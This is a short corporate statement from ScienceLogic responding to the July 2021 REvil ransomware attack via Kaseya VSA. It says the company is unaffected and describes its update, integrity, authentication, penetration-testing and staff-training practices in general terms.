Our Response to RansomWare Attacks
The Wall Street Journal reported this week that a group of Russian hackers calling themselves REvil is demanding $70 million to unlock computers in a widespread attack that started on July 2. This is our response to these attacks.
This week brought news of further cybersecurity threats involving Ransomware attacks on global enterprises via Kaseya software management tool. What we know to date is to classify this as a supply-chain attack similar to the SolarWinds breach from the recent past.
Although there are distinct differences in the methods, the demands and the impact on organizations, the attack vector does have many common traits. The organizations most acutely impacted are MSPs and their enterprise customers who have downloaded the software updates.
In response to inbound inquiries, we at ScienceLogic can confirm that we are aware of events as publicly disclosed and are unaffected by them. We do not run any Kaseya products or more specifically the affected VSA software. As such, we have no known exposure to report.
To further expand on how we protect our flagship product and operations, we list our practices in three critical areas that surfaced from this attack:
- Software Update Process: The ScienceLogic SL1 platform (SL1) software updates require user interaction to validate and deploy the software into production. Through this process, additional checks are introduced before an update can be deployed. For our SaaS customers, upgrades must be approved by a change review board prior to implementation into the production environment.
- Preserving Software Integrity and Security: We believe in creating layers of security adopted throughout the product.
- It starts with our update file which is encrypted and access to it is restricted to SalesForce and Amazon Web Services preserving the integrity of the software.
- Second, our distributed architecture (collectors) built in a hub and spoke system as another layer of defense to minimize the reach of the SL1 appliances.
- Third, SL1 performs data collection using the least privileges required.
- Fourth, our use of Linux as our underlying operating system makes us less vulnerable to commonly exploited Windows attack vectors.
- Fifth, our broad adoption of multi-factor authentication extends to all critical systems including, but not limited to, Salesforce/AWS/source control systems.
- Lastly, every major release of SL1 undergoes rigorous penetration testing by an accredited third-party penetration testing firm. ScienceLogic also performs internal penetration testing to identify potential vulnerabilities in the product.
- Staff and Field Training: To ensure our staff is vigilant against well-known phishing, stolen passwords, and authentication exploits, we’ve been in partnership with KnowBe4 to ensure every employee passes annual security training and quarterly refreshers that demand spot-checks on all staff adhering to well-established processes.
For additional information, please visit: